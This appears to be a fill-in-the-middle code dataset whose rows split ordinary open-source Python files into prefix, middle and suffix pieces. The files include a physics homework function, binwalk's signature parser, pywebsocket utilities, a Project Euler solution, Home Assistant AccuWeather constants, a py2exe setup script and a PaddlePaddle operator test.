| repo_name (string, 5-100 chars) | path (string, 4-231 chars) | language (string, 1 value) | license (string, 15 values) | size (int64, 6-947k) | score (float64, 0-0.34) | prefix (string, 0-8.16k chars) | middle (string, 3-512 chars) | suffix (string, 0-8.17k chars) |
|---|---|---|---|---|---|---|---|---|
kfollette/ASTR200-Spring2017
|
Homework/diff_int.py
|
Python
|
mit
| 441
| 0.022676
|
def diff_int(d=0.01*u.cm,a=0.001*u.cm,wl=400*u.nm):
'''
function that returns the i
|
ntensity of a double slit interference pattern
'''
theta = arange(-10,10,1e-5)*u.degree
x = pi*a*sin(theta)/wl*u.radian
xnew = x.decompose()
i_single = (sin(xnew)/xnew)**2
y = pi*d*sin(theta)/wl*u.radian
ynew = y.decompose()
i_double = (cos
|
(ynew))**2
I = i_single*i_double
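# The product above is the standard double-slit pattern with a finite slit
# width: I(theta) = (sin(x)/x)**2 * cos(y)**2, with x = pi*a*sin(theta)/wl
# and y = pi*d*sin(theta)/wl, i.e. a single-slit diffraction envelope
# modulating the two-slit interference fringes.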
plot(theta,I)
return
|
17twenty/binwalk
|
src/binwalk/core/parser.py
|
Python
|
mit
| 13,154
| 0.004485
|
# Code for performing minimal parsing of libmagic-compatible signature files.
# This allows for building a single signature file from multiple other signature files,
# and for parsing out the initial magic signature bytes for each signature (used for
# pre-processing of data to limit the number of actual calls into libmagic).
#
# Also performs splitting/formatting of libmagic result text.
import io
import re
import os.path
import tempfile
import binwalk.core.common
from binwalk.core.compat import *
from binwalk.core.filter import FilterType
class MagicSignature(object):
def __init__(self, **kwargs):
self.offset = 0
self.type = ''
self.condition = ''
self.description = ''
self.length = 0
for (k,v) in iterator(kwargs):
try:
v = int(v, 0)
except KeyboardInterrupt as e:
raise e
except Exception:
pass
setattr(self, k, v)
class MagicParser(object):
'''
Class for loading, parsing and creating libmagic-compatible magic files.
This class is primarily used internally by the Binwalk class, and a class instance of it is available via the Binwalk.parser object.
One useful method however, is file_from_string(), which will generate a temporary magic file from a given signature string:
import binwalk
bw = binwalk.Binwalk()
# Create a temporary magic file that contains a single entry with a signature of '\\x00FOOBAR\\xFF', and append the resulting
# temporary file name to the list of magic files in the Binwalk class instance.
bw.magic_files.append(bw.parser.file_from_string('\\x00FOOBAR\\xFF', display_name='My custom signature'))
bw.scan('firmware.bin')
All magic files generated by this class will be deleted when the class destructor is called.
'''
BIG_ENDIAN = 'big'
LITTLE_ENDIAN = 'little'
MAGIC_STRING_FORMAT = "%d\tstring\t%s\t%s\n"
DEFAULT_DISPLAY_NAME = "Raw string signature"
WILDCARD = 'x'
# If libmagic returns multiple results, they are delimited with this string.
RESULT_SEPERATOR = "\\012- "
def __init__(self, filter=None, smart=None):
'''
Class constructor.
@filter - Instance of the MagicFilter class. May be None if the parse/parse_file methods are not used.
@smart - Instance of the SmartSignature class. May be None if the parse/parse_file methods are not used.
Returns None.
'''
self.matches = set([])
self.signatures = {}
self.filter = filter
self.smart = smart
self.raw_fd = None
self.signature_count = 0
self.signature_set = set()
def __del__(self):
try:
self.cleanup()
except KeyboardInterrupt as e:
raise e
except Exception:
pass
def rm_magic_files(self):
'''
Cleans up the temporary magic file(s).
Returns None.
'''
try:
self.fd.close()
except KeyboardInterrupt as e:
raise e
except Exception:
pass
try:
self.raw_fd.close()
except KeyboardInterrupt as e:
raise e
except Exception:
pass
def cleanup(self):
'''
Cleans up any tempfiles created by the class instance.
Returns None.
'''
self.rm_magic_files()
def file_from_string(self, signature_string, offset=0, display_name=DEFAULT_DISPLAY_NAME):
'''
Generates a magic file from a signature string.
This method is intended to be used once per instance.
If invoked multiple times, any previously created magic files will be closed and deleted.
@signature_string - The string signature to search for.
@offset - The offset at which the signature should occur.
@display_name - The text to display when the signature is found.
Returns the name of the generated temporary magic file.
'''
self.raw_fd = tempfile.NamedTemporaryFile()
self.raw_fd.write(str2bytes(self.MAGIC_STRING_FORMAT % (offset, signature_string, display_name)))
self.raw_fd.seek(0)
return self.
|
raw_fd.name
def parse(self, file_name):
'''
Parses magic file(s) and concatenates them into a single temporary magic file
while simultaneously removing filtered signatures.
@file_name - Magic file, or list of magic files, to parse.
Returns the name of the generated temporary magic file, which will be automatically
deleted when the class destructor is called.
'''
self.matches = set([])
self.signatures = {}
|
self.signature_count = 0
self.fd = tempfile.NamedTemporaryFile()
if isinstance(file_name, type([])):
files = file_name
else:
files = [file_name]
for fname in files:
if fname:
if os.path.exists(fname) and os.path.isfile(fname):
self.parse_file(fname)
else:
binwalk.core.common.warning("Magic file '%s' does not exist!" % fname)
self.fd.seek(0)
return self.fd.name
def parse_file(self, file_name):
'''
Parses a magic file and appends valid signatures to the temporary magic file, as allowed
by the existing filter rules.
@file_name - Magic file to parse.
Returns None.
'''
# Default to not including signature entries until we've
# found what looks like a valid entry.
include = False
line_count = 0
try:
fp = open(file_name, 'rb')
for line in fp.readlines():
line = bytes2str(line)
line_count += 1
# Check if this is the first line of a signature entry
entry = self._parse_line(line)
if entry is not None:
# If this signature is marked for inclusion, include it.
if self.filter.filter(entry.description) == FilterType.FILTER_INCLUDE:
include = True
self.signature_count += 1
if not has_key(self.signatures, entry.offset):
self.signatures[entry.offset] = []
if entry.condition not in self.signatures[entry.offset]:
self.signatures[entry.offset].append(entry.condition)
else:
include = False
# Keep writing lines of the signature to the temporary magic file until
# we detect a signature that should not be included.
if include:
self.fd.write(str2bytes(line))
fp.close()
self.build_signature_set()
except KeyboardInterrupt as e:
raise e
except Exception as e:
raise Exception("Error parsing magic file '%s' on line %d: %s" % (file_name, line_count, str(e)))
def _parse_line(self, line):
'''
Parses a signature line into its four parts (offset, type, condition and description),
looking for the first line of a given signature.
@line - The signature line to parse.
Returns a dictionary with the respective line parts populated if the line is the first of a signature.
Returns a dictionary with all parts set to None if the line is not the first of a signature.
'''
entry = MagicSignature()
# Quick and dirty pre-filter. We are only concerned with the first line of a
# signature, which will always start with a number. Make sure the first byte of
# the line is a number; if not, don't process.
if line[:1] < '0' or line[:1] > '9':
return None
try:
# Split the line into white-space separated parts.
# For this to
|
CyanogenMod/android_external_chromium-trace
|
trace-viewer/third_party/pywebsocket/src/mod_pywebsocket/util.py
|
Python
|
bsd-3-clause
| 16,267
| 0.000184
|
# Copyright 2011, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""WebSocket utilities.
"""
import array
import errno
# Import hash classes from a module available and recommended for each Python
# version and re-export those symbols. Use the sha and md5 modules in Python 2.4, and
# hashlib module in Python 2.6.
try:
import hashlib
md5_hash = hashlib.md5
sha1_hash = hashlib.sha1
except ImportError:
import md5
import sha
md5_hash = md5.md5
sha1_hash = sha.sha
import StringIO
import logging
import os
import re
import socket
import traceback
import zlib
def get_stack_trace():
"""Get the current stack trace as string.
This is needed to support Python 2.3.
TODO: Remove this when we only support Python 2.4 and above.
Use traceback.format_exc instead.
"""
out = StringIO.StringIO()
traceback.print_exc(file=out)
return out.getvalue()
def prepend_message_to_exception(message, exc):
"""Prepend message to the exception."""
exc.args = (message + str(exc),)
return
def __translate_interp(interp, cygwin_path):
"""Translate interp program path for Win32 python to run cygwin program
(e.g. perl). Note that it doesn't support paths that contain spaces,
which is typically true for Unix, where #!-script is written.
For Win32 python, cygwin_path is a directory of cygwin binaries.
Args:
interp: interp command line
cygwin_path: directory name of cygwin binary, or None
Returns:
translated interp command line.
"""
if not cygwin_path:
return interp
m = re.match('^[^ ]*/([^ ]+)( .*)?', interp)
if m:
cmd = os.path.join(cygwin_path, m.group(1))
return cmd + m.group(2)
return interp
def get_script_interp(script_path, cygwin_path=None):
"""Gets #!-interpreter command line from the script.
It also fixes command path. When Cygwin Python is used, e.g. in WebKit,
it could run "/usr/bin/perl -wT hello.pl".
When Win32 Python is used, e.g. in Chromium, it couldn't. So, fix
"/usr/bin/perl" to "<cygwin_path>\perl.exe".
Args:
script_path: pathname of the script
cygwin_path: directory name of cygwin binary, or None
Returns:
#!-interpreter command line, or None if it is not #!-script.
"""
fp = open(script_path)
line = fp.readline()
fp.close()
m = re.match('^#!(.*)', line)
if m:
return __translate_interp(m.group(1), cygwin_path)
return None
def wrap_popen3_for_win(cygwin_path):
"""Wrap popen3 to support #!-script on Windows.
Args:
cygwin_path: path for cygwin binary if command path is needed to be
translated. None if no translation required.
"""
__orig_popen3 = os.popen3
def __wrap_popen3(cmd, mode='t', bufsize=-1):
cmdline = cmd.split(' ')
interp = get_script_interp(cmdline[0], cygwin_path)
if interp:
cmd = interp + ' ' + cmd
return __orig_popen3(cmd, mode, bufsize)
os.popen3 = __wrap_popen3
def hexify(s):
return ' '.join(map(lambda x: '%02x' % ord(x), s))
def get_class_logger(o):
return logging.getLogger(
'%s.%s' % (o.__class__.__module__, o.__class__.__name__))
class NoopMasker(object):
"""A masking object that has the same interface as RepeatedXorMasker but
just returns the string passed in without making any change.
"""
def __init__(self):
pass
def mask(self, s):
return s
class RepeatedXorMasker(object):
"""A masking object that applies XOR on the string given to mask method
with the masking bytes given to the constructor repeatedly. This object
remembers the
|
position in the masking bytes the last mask method call
ended and resumes from that point on the next mask method call.
"""
def __init__(self, mask):
self._mask = map(ord, mask)
self._mask_size = len(self._mask)
self._count = 0
def mask(self, s):
resu
|
lt = array.array('B')
result.fromstring(s)
# Use temporary local variables to eliminate the cost to access
# attributes
count = self._count
mask = self._mask
mask_size = self._mask_size
for i in xrange(len(result)):
result[i] ^= mask[count]
count = (count + 1) % mask_size
self._count = count
return result.tostring()
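# A minimal usage sketch (not part of the original pywebsocket module):
# because RepeatedXorMasker remembers its position in the masking key,
# masking a payload in chunks yields the same bytes as masking it in one
# call, and masking the result again with a fresh masker restores the input.
def _repeated_xor_masker_example():
    whole = RepeatedXorMasker('abcd').mask('0123456789')
    chunked_masker = RepeatedXorMasker('abcd')
    chunked = chunked_masker.mask('01234') + chunked_masker.mask('56789')
    assert whole == chunked
    assert RepeatedXorMasker('abcd').mask(whole) == '0123456789'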
class DeflateRequest(object):
"""A wrapper class for request object to intercept send and recv to perform
deflate compression and decompression transparently.
"""
def __init__(self, request):
self._request = request
self.connection = DeflateConnection(request.connection)
def __getattribute__(self, name):
if name in ('_request', 'connection'):
return object.__getattribute__(self, name)
return self._request.__getattribute__(name)
def __setattr__(self, name, value):
if name in ('_request', 'connection'):
return object.__setattr__(self, name, value)
return self._request.__setattr__(name, value)
# By making wbits option negative, we can suppress CMF/FLG (2 octet) and
# ADLER32 (4 octet) fields of zlib so that we can use zlib module just as
# deflate library. DICTID won't be added as far as we don't set dictionary.
# LZ77 window of 32K will be used for both compression and decompression.
# For decompression, we can just use 32K to cover any windows size. For
# compression, we use 32K so receivers must use 32K.
#
# Compression level is Z_DEFAULT_COMPRESSION. We don't have to match level
# to decode.
#
# See zconf.h, deflate.cc, inflate.cc of zlib library, and zlibmodule.c of
# Python. See also RFC1950 (ZLIB 3.3).
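# A minimal sketch (not part of the original pywebsocket module) of the raw
# deflate behaviour described above: with negative wbits the stream carries
# no zlib header or ADLER32 trailer, so it is plain DEFLATE data.
def _raw_deflate_roundtrip_example():
    compressor = zlib.compressobj(
        zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED, -zlib.MAX_WBITS)
    # Z_SYNC_FLUSH emits all pending output without terminating the stream.
    data = compressor.compress('hello') + compressor.flush(zlib.Z_SYNC_FLUSH)
    decompressor = zlib.decompressobj(-zlib.MAX_WBITS)
    assert decompressor.decompress(data) == 'hello'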
class _Deflater(object):
def __init__(self, window_bits):
self._logger = get_class_logger(self)
self._compress = zlib.compressobj(
zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED, -window_bits)
def compress_and_flush(self, bytes):
compressed_bytes = self._compress.compress(bytes)
compressed_bytes += self._compress.flush(zlib.Z_SYNC_FLUSH)
self._logger.debug('Compress input %r', bytes)
self._logger.debug('Compress result %r', compressed_bytes)
return compressed_bytes
class _Inflater(object):
def __init__(self):
self._logger = get_class_logger(self)
self._unconsumed = ''
self.reset()
def decompress(self, size):
if not (size == -1 or size > 0):
raise Exception('size must be -1 or positive')
data = ''
while True:
if size == -1:
data += self._decompress.decompress(self.
|
clairejaja/project-euler
|
src/main/python/problem2/even_fibonacci_numbers.py
|
Python
|
mit
| 876
| 0.001142
|
# Claire Jaja
# 11/1/2014
#
# Project Euler
# Problem 2
# Even Fibonacci numbers
#
# Each new term in the Fibonacci sequence is generated by adding
# the previous two terms.
# By starting with 1 and
|
2, the first 10 terms will be:
# 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, ...
# By considering the terms
|
in the Fibonacci sequence
# whose values do not exceed four million,
# find the sum of the even-valued terms.
def main():
max_value = 4000000
# set up first three terms
previous_previous_term = 1
previous_term = 1
current_term = 2
my_sum = 0
while current_term < max_value:
if current_term % 2 == 0:
my_sum += current_term
previous_previous_term = previous_term
previous_term = current_term
current_term = previous_term + previous_previous_term
print(my_sum)
if __name__ == "__main__":
main()
|
kennedyshead/home-assistant
|
homeassistant/components/accuweather/const.py
|
Python
|
apache-2.0
| 10,736
| 0
|
"""Constants for AccuWeather integration."""
from __future__ import annotations
from typing import Final
from homeassistant.components.weather import (
ATTR_CONDITION_CLEAR_NIGHT,
ATTR_CONDITION_CLOUDY,
ATTR_CONDITION_EXCEPTIONAL,
ATTR_CONDITION_FOG,
ATTR_CONDITION_HAIL,
ATTR_CONDITION_LIGHTNING,
ATTR_CONDITION_LIGHTNING_RAINY,
ATTR_CONDITION_PARTLYCLOUDY,
ATTR_CONDITION_POURING,
ATTR_CONDITION_RAINY,
ATTR_CONDITION_SNOWY,
ATTR_CONDITION_SNOWY_RAINY,
ATTR_CONDITION_SUNNY,
ATTR_CONDITION_WINDY,
)
from homeassistant.const import (
ATTR_DEVICE_CLASS,
ATTR_ICON,
CONCENTRATION_PARTS_PER_CUBIC_METER,
DEVICE_CLASS_TEMPERATURE,
LENGTH_FEET,
LENGTH_INCHES,
LENGTH_METERS,
LENGTH_MILLIMETERS,
PERCENTAGE,
SPEED_KILOMETERS_PER_HOUR,
SPEED_MILES_PER_HOUR,
TEMP_CELSIUS,
TEMP_FAHRENHEIT,
TIME_HOURS,
UV_INDEX,
)
from .model import SensorDescription
API_IMPERIAL: Final = "Imperial"
API_METRIC: Final = "Metric"
ATTRIBUTION: Final = "Data provided by AccuWeather"
ATTR_ENABLED: Final = "enabled"
ATTR_FORECAST: Final = "forecast"
ATTR_LABEL: Final = "label"
ATTR_UNIT_IMPERIAL: Final = "unit_imperial"
ATTR_UNIT_METRIC: Final = "unit_metric"
CONF_FORECAST: Final = "forecast"
COORDINATOR: Final = "coordinator"
DOMAIN: Final = "accuweather"
MANUFACTURER: Final = "AccuWeather, Inc."
MAX_FORECAST_DAYS: Final = 4
NAME: Final = "AccuWeather"
UNDO_UPDATE_LISTENER: Final = "undo_update_listener"
CONDITION_CLASSES: Final[dict[str, list[int]]] = {
ATTR_CONDITION_CLEAR_NIGHT: [33, 34, 37],
ATTR_CONDITION_CLOUDY: [7, 8, 38],
ATTR_CONDITION_EXCEPTIONAL: [24, 30, 31],
ATTR_CONDITION_FOG: [11],
ATTR_CONDITION_HAIL: [25],
ATTR_CONDITION_LIGHTNING: [15],
ATTR_CONDITION_LIGHTNING_RAINY: [16, 17, 41, 42],
ATTR_CONDITION_PARTLYCLOUDY: [3, 4, 6, 35, 36],
ATTR_CONDITION_POURING: [18],
ATTR_CONDITION_RAINY: [12, 13, 14, 26, 39, 40],
ATTR_CONDITION_SNOWY: [19, 20, 21, 22, 23, 43, 44],
ATTR_CONDITION_SNOWY_RAINY: [29],
ATTR_CONDITION_SUNNY: [1, 2, 5],
ATTR_CONDITION_WINDY: [32],
}
FORECAST_SENSOR_TYPES: Final[dict[str, SensorDescription]] = {
"CloudCoverDay": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-cloudy",
ATTR_LABEL: "Cloud Cover Day",
ATTR_UNIT_METRIC: PERCENTAGE,
ATTR_UNIT_IMPERIAL: PERCENTAGE,
ATTR_ENABLED: False,
},
"CloudCoverNight": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-cloudy",
ATTR_LABEL: "Cloud Cover Night",
ATTR_UNIT_METRIC: PERCENTAGE,
ATTR_UNIT_IMPERIAL: PERCENTAGE,
ATTR_ENABLED: False,
},
"Grass": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:grass",
ATTR_LABEL: "Grass Pollen",
ATTR_UNIT_METRIC: CONCENTRATION_PARTS_PER_CUBIC_METER,
ATTR_UNIT_IMPERIAL: CONCENTRATION_PARTS_PER_CUBIC_METER,
ATTR_ENABLED: False,
},
"HoursOfSun": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-partly-cloudy",
ATTR_LABEL: "Hours Of Sun",
ATTR_UNIT_METRIC: TIME_HOURS,
ATTR_UNIT_IMPERIAL: TIME_HOURS,
ATTR_ENABLED: True,
},
"Mold": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:blur",
ATTR_LABEL: "Mold Pollen",
ATTR_UNIT_METRIC: CONCENTRATION_PARTS_PER_CUBIC_METER,
ATTR_UNIT_IMPERIAL: CONCENTRATION_PARTS_PER_CUBIC_METER,
ATTR_ENABLED: False,
},
"Ozone": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:vector-triangle",
ATTR_LABEL: "Ozone",
ATTR_UNIT_METRIC: None,
ATTR_UNIT_IMPERIAL: None,
ATT
|
R_ENABLED
|
: False,
},
"Ragweed": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:sprout",
ATTR_LABEL: "Ragweed Pollen",
ATTR_UNIT_METRIC: CONCENTRATION_PARTS_PER_CUBIC_METER,
ATTR_UNIT_IMPERIAL: CONCENTRATION_PARTS_PER_CUBIC_METER,
ATTR_ENABLED: False,
},
"RealFeelTemperatureMax": {
ATTR_DEVICE_CLASS: DEVICE_CLASS_TEMPERATURE,
ATTR_ICON: None,
ATTR_LABEL: "RealFeel Temperature Max",
ATTR_UNIT_METRIC: TEMP_CELSIUS,
ATTR_UNIT_IMPERIAL: TEMP_FAHRENHEIT,
ATTR_ENABLED: True,
},
"RealFeelTemperatureMin": {
ATTR_DEVICE_CLASS: DEVICE_CLASS_TEMPERATURE,
ATTR_ICON: None,
ATTR_LABEL: "RealFeel Temperature Min",
ATTR_UNIT_METRIC: TEMP_CELSIUS,
ATTR_UNIT_IMPERIAL: TEMP_FAHRENHEIT,
ATTR_ENABLED: True,
},
"RealFeelTemperatureShadeMax": {
ATTR_DEVICE_CLASS: DEVICE_CLASS_TEMPERATURE,
ATTR_ICON: None,
ATTR_LABEL: "RealFeel Temperature Shade Max",
ATTR_UNIT_METRIC: TEMP_CELSIUS,
ATTR_UNIT_IMPERIAL: TEMP_FAHRENHEIT,
ATTR_ENABLED: False,
},
"RealFeelTemperatureShadeMin": {
ATTR_DEVICE_CLASS: DEVICE_CLASS_TEMPERATURE,
ATTR_ICON: None,
ATTR_LABEL: "RealFeel Temperature Shade Min",
ATTR_UNIT_METRIC: TEMP_CELSIUS,
ATTR_UNIT_IMPERIAL: TEMP_FAHRENHEIT,
ATTR_ENABLED: False,
},
"ThunderstormProbabilityDay": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-lightning",
ATTR_LABEL: "Thunderstorm Probability Day",
ATTR_UNIT_METRIC: PERCENTAGE,
ATTR_UNIT_IMPERIAL: PERCENTAGE,
ATTR_ENABLED: True,
},
"ThunderstormProbabilityNight": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-lightning",
ATTR_LABEL: "Thunderstorm Probability Night",
ATTR_UNIT_METRIC: PERCENTAGE,
ATTR_UNIT_IMPERIAL: PERCENTAGE,
ATTR_ENABLED: True,
},
"Tree": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:tree-outline",
ATTR_LABEL: "Tree Pollen",
ATTR_UNIT_METRIC: CONCENTRATION_PARTS_PER_CUBIC_METER,
ATTR_UNIT_IMPERIAL: CONCENTRATION_PARTS_PER_CUBIC_METER,
ATTR_ENABLED: False,
},
"UVIndex": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-sunny",
ATTR_LABEL: "UV Index",
ATTR_UNIT_METRIC: UV_INDEX,
ATTR_UNIT_IMPERIAL: UV_INDEX,
ATTR_ENABLED: True,
},
"WindGustDay": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-windy",
ATTR_LABEL: "Wind Gust Day",
ATTR_UNIT_METRIC: SPEED_KILOMETERS_PER_HOUR,
ATTR_UNIT_IMPERIAL: SPEED_MILES_PER_HOUR,
ATTR_ENABLED: False,
},
"WindGustNight": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-windy",
ATTR_LABEL: "Wind Gust Night",
ATTR_UNIT_METRIC: SPEED_KILOMETERS_PER_HOUR,
ATTR_UNIT_IMPERIAL: SPEED_MILES_PER_HOUR,
ATTR_ENABLED: False,
},
"WindDay": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-windy",
ATTR_LABEL: "Wind Day",
ATTR_UNIT_METRIC: SPEED_KILOMETERS_PER_HOUR,
ATTR_UNIT_IMPERIAL: SPEED_MILES_PER_HOUR,
ATTR_ENABLED: True,
},
"WindNight": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-windy",
ATTR_LABEL: "Wind Night",
ATTR_UNIT_METRIC: SPEED_KILOMETERS_PER_HOUR,
ATTR_UNIT_IMPERIAL: SPEED_MILES_PER_HOUR,
ATTR_ENABLED: True,
},
}
SENSOR_TYPES: Final[dict[str, SensorDescription]] = {
"ApparentTemperature": {
ATTR_DEVICE_CLASS: DEVICE_CLASS_TEMPERATURE,
ATTR_ICON: None,
ATTR_LABEL: "Apparent Temperature",
ATTR_UNIT_METRIC: TEMP_CELSIUS,
ATTR_UNIT_IMPERIAL: TEMP_FAHRENHEIT,
ATTR_ENABLED: False,
},
"Ceiling": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-fog",
ATTR_LABEL: "Cloud Ceiling",
ATTR_UNIT_METRIC: LENGTH_METERS,
ATTR_UNIT_IMPERIAL: LENGTH_FEET,
ATTR_ENABLED: True,
},
"CloudCover": {
ATTR_DEVICE_CLASS: None,
ATTR_ICON: "mdi:weather-cloudy",
ATTR_LABEL: "Cloud Cover",
ATTR_UNIT_METRIC: PERCENTAGE,
ATTR_UNIT_IMPERIAL: PERCENTAGE,
ATTR_ENABLED: False,
},
"DewPoint": {
ATTR_DEVICE_CLASS: DEVICE_CLASS_TEM
|
dallingham/regenerate
|
setup-win.py
|
Python
|
gpl-2.0
| 3,108
| 0.003861
|
from setuptools import setup
import py2exe
import os
import glob
__import__('gtk')
__import__('jinja2')
__import__('docutils')
setup_dict = dict(
name='regenerate',
version='1.0.0',
license='License.txt',
author='Donald N. Allingham',
author_email='[email protected]',
description='Register editor for ASIC/FPGA designs',
long_description='Allows users to manage registers for '
'ASIC and FPGA designs. Capable of generating Verilog '
'RTL, test code, C and assembler header files, and documentation.',
packages=[
"regenerate",
"regenerate.db",
"regenerate.importers",
"regenerate.extras",
"regenerate.settings",
"regenerate.ui",
"regenerate.writers"
],
package_dir={
"regenerate" : "regenerate",
},
package_data={
'regenerat
|
e' : [
"data/ui/*.ui",
"data/medi
|
a/*",
"data/help/*.rst",
"data/extra/*",
"data/*.*",
"writers/templates/*"
]
},
include_package_data=True,
url="https://github.com/dallingham/regenerate",
scripts=[
"bin/regenerate",
"bin/regbuild",
"bin/regupdate",
"bin/regxref",
"bin/regdiff"
],
classifiers=[
'Operating System :: POSIX', 'Programming Language :: Python :: 2.7',
'License :: OSI Approved :: GNU General Public License v2 or later (GPLv2+)',
'Topic :: Scientific/Engineering :: Electronic Design Automation (EDA)'
],
windows=[
{
"script" : "bin/regenerate",
"icon_resources" : [(1, "regenerate/data/media/flop.ico")]
}
],
options={
'py2exe': {
'includes' : 'cairo, pango, pangocairo, atk, gobject, gio, gtk.keysyms, jinja2',
'skip_archive' : True,
'dll_excludes': [
'MSVCP90.dll',
'api-ms-win-core-string-l1-1-0.dll',
'api-ms-win-core-registry-l1-1-0.dll',
'api-ms-win-core-errorhandling-l1-1-1.dll',
'api-ms-win-core-string-l2-1-0.dll',
'api-ms-win-core-profile-l1-1-0.dll',
'api-ms-win-core-processthreads-l1-1-2.dll',
'api-ms-win-core-libraryloader-l1-2-1.dll',
'api-ms-win-core-file-l1-2-1.dll',
'api-ms-win-security-base-l1-2-0.dll',
'api-ms-win-eventing-provider-l1-1-0.dll',
'api-ms-win-core-heap-l2-1-0.dll',
'api-ms-win-core-libraryloader-l1-2-0.dll',
'api-ms-win-core-localization-l1-2-1.dll',
'api-ms-win-core-sysinfo-l1-2-1.dll',
'api-ms-win-core-synch-l1-2-0.dll',
'api-ms-win-core-heap-l1-2-0.dll']
}
},
)
setup(**setup_dict)
|
luotao1/Paddle
|
python/paddle/fluid/tests/unittests/test_fusion_seqpool_cvm_concat_op.py
|
Python
|
apache-2.0
| 4,299
| 0.000465
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
from op_test import OpTest
from test_reorder_lod_tensor import convert_to_offset
from sequence.test_sequence_pool import compute_seqpool_sum, compute_seqpool_avg, compute_seqpool_sqrt
from test_cvm_op import cvm_compute
class TestFusionSeqPoolCVMConcatOp(OpTest):
def setUp(self):
self.w = 11
self.use_cvm = True
self.lods = [[[2, 3, 5]], [[1, 5, 2]]]
self.set_conf()
self.set_pooltype()
self.op_type = 'fusion_seqpool_cvm_concat'
self.axis = 1
bs = len(self.lods[0][0])
inputs = []
outs = []
# The cvm variable is not actually used.
cvm = np.array([[0.6, 0.4]]).astype("float32")
i = 0
for lod in self.lods:
assert bs == len(lod[0]), 'All lod size should be equal'
x = np.random.uniform(0.1, 1,
[sum(lod[0]), self.w]).astype('float32')
offset = convert_to_offset(lod)
out = np.zeros((bs, self.w)).astype('float32')
if self.pooltype == "SUM":
compute_seqpool_sum(x, offset, out)
out = cvm_compute(out, self.w, self.use_cvm)
elif self.pooltype == "AVERAGE":
compute_seqpool_avg(x, offset, out)
out = cvm_compute(out, self.w, self.use_cvm)
elif self.pooltype == "SQRT":
compute_seqpool_sqrt(x, offset, out)
out = cvm_compute(out, self.w, self.use_cvm)
else:
raise Exception("Unsupported pool type!")
inputs.append(('x_{0}'.format(i), (x, lod)))
outs.append(out)
i = i + 1
self.inputs = {'X': inputs, "CVM": cvm}
self.outputs = {'Out': np.concatenate(outs, axis=se
|
lf.axis)}
self.attrs = {
'pooltype': self.pooltype,
'axis': self.axis,
}
def set_pooltype(self):
self.pooltype = "SUM"
d
|
ef set_conf(self):
pass
def test_check_output(self):
self.check_output()
class TestFusionSeqPoolCVMConcatOpCase1(TestFusionSeqPoolCVMConcatOp):
def set_conf(self):
self.lods = [[[1]]]
class TestFusionSeqPoolCVMConcatOpCase2(TestFusionSeqPoolCVMConcatOp):
def set_conf(self):
self.lods = [[[1]], [[1]], [[1]]]
class TestFusionSeqPoolCVMConcatOpCase3(TestFusionSeqPoolCVMConcatOp):
def set_conf(self):
self.lods = [[[1, 3, 4, 6]]]
self.w = 10
class TestFusionSeqPoolCVMConcatOpCase4(TestFusionSeqPoolCVMConcatOp):
def set_conf(self):
self.lods = [[[2, 13, 4]], [[1, 1, 1]], [[5, 3, 1]], [[9, 10, 3]]]
self.w = 3
## test avg pool and sqrt
def create_test_avg_sqrt_class(parent):
class TestSeqPoolAvgCase(parent):
def set_pooltype(self):
self.pooltype = "AVERAGE"
class TestSeqPoolSqrtCase(parent):
def set_pooltype(self):
self.pooltype = "SQRT"
cls_name_avg = "{0}_{1}".format(parent.__name__, "avg")
cls_name_sqrt = "{0}_{1}".format(parent.__name__, "sqrt")
TestSeqPoolAvgCase.__name__ = cls_name_avg
